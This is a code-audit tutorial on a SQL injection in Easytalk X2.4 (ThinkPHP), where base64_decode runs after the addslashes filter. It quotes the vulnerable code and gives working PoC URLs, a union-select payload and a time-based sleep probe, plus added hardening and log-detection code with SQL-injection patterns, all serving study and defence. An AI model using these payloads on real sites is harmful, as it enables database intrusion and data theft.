0x01 Background
Most of today's web applications have some global filter against SQL injection: in PHP, either magic_quotes_gpc is enabled or a global file such as common.php passes every received parameter through addslashes(), which escapes single quotes in particular. To get past such global protection we look for encoding and decoding functions applied after the filter; this article covers the base64_decode() case.
The vulnerability was reported on WooYun: http://www.wooyun.org/bugs/wooyun-2014-050338
0x02 Environment Setup
Following the report, we use an older version of the Easytalk program, X2.4.
① I packed a copy of the source: Http://pan.baidu.com/s/1bopOFNL
② Extract it into the www/easytalk directory and follow the installer's prompts step by step; if you hit problems, search Baidu or Google. After a successful install, visiting the site looks like this:
0X03 Vulnerability Analysis
First look at the source structure: it is built on the ThinkPHP framework, which makes it fairly complex.
Readers who are interested can study the framework and then continue; newcomers only need to know that ThinkPHP filters received parameters, and that the handling depends on whether magic_quotes_gpc is enabled on your server:
1. /thinkphp/extend/library/org/util/input.class.php, line 266:
    /**
     +----------------------------------------------------------
     * If MAGIC_QUOTES_GPC is off, this function escapes the string
     +----------------------------------------------------------
     * @access public
     +----------------------------------------------------------
     * @param string $string  string to be processed
     +----------------------------------------------------------
     * @return string
     +----------------------------------------------------------
     */
    static public function addslashes($string) {
        // Escape only when PHP has not already done so via magic_quotes_gpc
        if (!get_magic_quotes_gpc()) {
            $string = addslashes($string);
        }
        return $string;
    }
2. Using the global search of the Seay code audit system, search for files containing the keyword "base64_decode"; SettingAction.class.php contains a place where the received parameter auth is passed through base64_decode:
3. Following this PHP file, we find that although the daddslashes function is applied for injection filtering, the parameter auth is then decoded with base64_decode, so the filter is bypassed and injection is possible:
    // E-mail authentication
    public function doauth() {
        $_authmsg = daddslashes($_GET['auth']);   // re-checks whether GPC is on and applies the injection filter
        $authmsg  = base64_decode($_authmsg);     // base64_decode restores the raw parameter, after the filter
        $tem      = explode(":", $authmsg);       // split the decoded authmsg on ":" into the array $tem
        $send_id  = $tem[0];
        $user     = M('Users');
        // $send_id is interpolated into the WHERE clause, causing the injection
        $row = $user->field('mailadres,auth_email')->where("user_id='$send_id'")->find();
        if ($_authmsg == $row['auth_email']) {
            $user->where("user_id='$send_id'")->setField('auth_email', 1);
            setcookie('setok', json_encode(array('lang' => L('mail6'), 'ico' => 1)), 0, '/');
        } else {
            setcookie('setok', json_encode(array('lang' => L('mail7'), 'ico' => 2)), 0, '/');
        }
        header('Location: ' . SITE_URL . '/?m=setting&a=mailauth');
    }
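The following is an added example, not Easytalk's own code, that reproduces the filter-order bug of doauth() without a database and then shows one hardened way to parse the token. daddslashes_demo() is a stand-in for Easytalk's daddslashes() with magic_quotes_gpc assumed off; the hardened parser assumes a token shape of "<numeric user_id>:<32 hex characters>", which is a guess for illustration, since the article does not document Easytalk's real auth format.

```php
<?php
// Added example, not Easytalk's code: reproduces the filter-order bug from
// doauth() without a database, then shows one hardened way to parse the token.

// Stand-in for Easytalk's daddslashes(); magic_quotes_gpc is assumed off,
// so the parameter is escaped with addslashes() as in the original.
function daddslashes_demo($s) {
    return addslashes($s);
}

// True when the filter changed nothing. For any valid base64 string this is
// always true: the base64 alphabet contains no quotes or backslashes.
function filter_is_noop($auth) {
    return daddslashes_demo($auth) === $auth;
}

// Vulnerable flow from the article: escape, then decode, then interpolate.
// Returns the WHERE clause string the application would hand to MySQL.
function vulnerable_where($auth) {
    $escaped = daddslashes_demo($auth);   // no-op on base64 input
    $decoded = base64_decode($escaped);   // quotes reappear here, after the filter
    $tem     = explode(":", $decoded);
    $send_id = $tem[0];
    return "user_id='$send_id'";
}

// Hardened flow: strict decode, validate the decoded shape, cast the id to int
// before it can reach a query. Returns null for anything unexpected.
// The token shape "<numeric user_id>:<32 hex chars>" is an assumption of this
// example; the article does not document Easytalk's real auth format.
function hardened_send_id($auth) {
    $decoded = base64_decode($auth, true);          // strict: non-base64 -> false
    if ($decoded === false) {
        return null;
    }
    if (!preg_match('/^(\d{1,10}):([0-9a-f]{32})$/', $decoded, $m)) {
        return null;
    }
    return (int) $m[1];                              // an integer cannot carry a quote
}

// Constructed inputs: the article's PoC payload and a benign token.
$poc    = base64_encode("hacking' union select user(),2#");
$benign = base64_encode("42:" . str_repeat("a", 32));

var_dump(filter_is_noop($poc));          // the filter did nothing
echo vulnerable_where($poc), "\n";       // the decoded quote lands inside the WHERE clause
var_dump(hardened_send_id($poc));        // rejected
var_dump(hardened_send_id($benign));     // accepted as an integer id
```

Run it with the PHP CLI. The point is that escaping must be applied to the value that actually reaches the query, i.e. after decoding, and that an integer id should be cast rather than quoted. In ThinkPHP the array form of where, where(array('user_id' => $send_id)), also lets the framework escape the value instead of interpolating it into a string.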
0x04 Proof of Concept
Construct a PoC that retrieves information about the database:
http://localhost/eazytalk/?m=setting&a=doauth&auth=aGFja2luZycgdW5pb24gc2VsZWN0IHVzZXIoKSwyIw==
Viewing the SQL statement shows that it executed successfully:
This turns out to be a blind injection with no visible output, so we use a time-based blind SQL statement. The PoC below tests whether the first character of the current database user name is 'r' (ASCII value 114):
Http://localhost/eazytalk/?m=index&a=mailactivity&auth= micgyw5kichzzwxly3qgawyokgfzy2lpkhn1ynn0cmluzygoc2vszwn0ihvzzxioksksmswxkskgpsaxmtqplhnszwvwkdupldapksm=
The page took 5 seconds to respond, which shows that the first character of user() is 'r'; viewing the SQL statement confirms it executed successfully:
Finally, interested readers can write a Python script to automate the blind injection.
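From the defender's side, the two PoCs above leave a recognisable trace: a base64 query parameter that decodes to SQL-like text, and, for the time-based variant, a response that takes about as long as the sleep() value. The script below is an added example, not part of the article, that scans constructed access-log lines for both signals. The log format (ip, method, URL, status, response time in ms) and the sample lines are constructed for this example.

```php
<?php
// Added example, not from the article: scan constructed access-log lines for
// base64 query parameters that decode to SQL-like text, and for slow
// responses that suggest a time-based blind injection.

// Split the query string ourselves so '+' (part of the base64 alphabet)
// is not turned into a space the way parse_str() would.
function query_params($url) {
    $params = array();
    $q = parse_url($url, PHP_URL_QUERY);
    if ($q === null || $q === false) {
        return $params;
    }
    foreach (explode('&', $q) as $pair) {
        $kv = explode('=', $pair, 2);       // split on the first '=' only
        if (count($kv) == 2) {
            $params[$kv[0]] = rawurldecode($kv[1]);
        }
    }
    return $params;
}

// Strict base64 decode; null unless the result is printable text.
function decode_param($value) {
    $raw = base64_decode($value, true);
    if ($raw === false || !ctype_print($raw)) {
        return null;
    }
    return $raw;
}

// Things a decoded auth token should never contain.
function sqli_indicators($decoded) {
    $patterns = array(
        'quote'   => "/['\"]/",
        'union'   => '/\bunion\b.*\bselect\b/i',
        'sleep'   => '/\b(sleep|benchmark)\s*\(/i',
        'comment' => '/(#|--\s|\/\*)/',
    );
    $hits = array();
    foreach ($patterns as $name => $re) {
        if (preg_match($re, $decoded)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// One constructed log line: "<ip> <method> <url> <status> <response_ms>".
// Returns a list of findings; empty when nothing is suspicious.
function analyse_line($line, $slow_ms = 4000) {
    $f = preg_split('/\s+/', trim($line));
    if (count($f) < 5) {
        return array();
    }
    list($ip, $method, $url, $status, $ms) = $f;
    $findings = array();
    foreach (query_params($url) as $name => $value) {
        $decoded = decode_param($value);
        if ($decoded === null) {
            continue;
        }
        $hits = sqli_indicators($decoded);
        if ($hits) {
            $findings[] = sprintf("%s param %s decodes to SQL-like text [%s]: %s",
                                  $ip, $name, implode(',', $hits), $decoded);
        }
    }
    if ((int) $ms >= $slow_ms) {
        $findings[] = sprintf("%s slow response (%d ms) on %s", $ip, $ms, $url);
    }
    return $findings;
}

// Constructed sample log: the article's union PoC, a constructed time-based
// probe, and a benign token.
$base  = "/eazytalk/?m=setting&a=doauth&auth=";
$lines = array(
    "203.0.113.5 GET " . $base . base64_encode("hacking' union select user(),2#") . " 302 35",
    "203.0.113.5 GET " . $base . base64_encode("2' and sleep(5)#") . " 302 5012",
    "198.51.100.7 GET " . $base . base64_encode("42:" . str_repeat("a", 32)) . " 302 31",
);

foreach ($lines as $line) {
    foreach (analyse_line($line) as $finding) {
        echo $finding, "\n";
    }
}
```

The first two lines produce findings and the benign third line produces none. In a real deployment the same decode-then-inspect step belongs in the WAF or in a log pipeline, because a filter that only inspects the raw (still base64-encoded) parameter sees nothing, for exactly the reason the vulnerable code missed the quotes.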
Original address:
http://www.cnbraid.com/2016/02/18/sql2/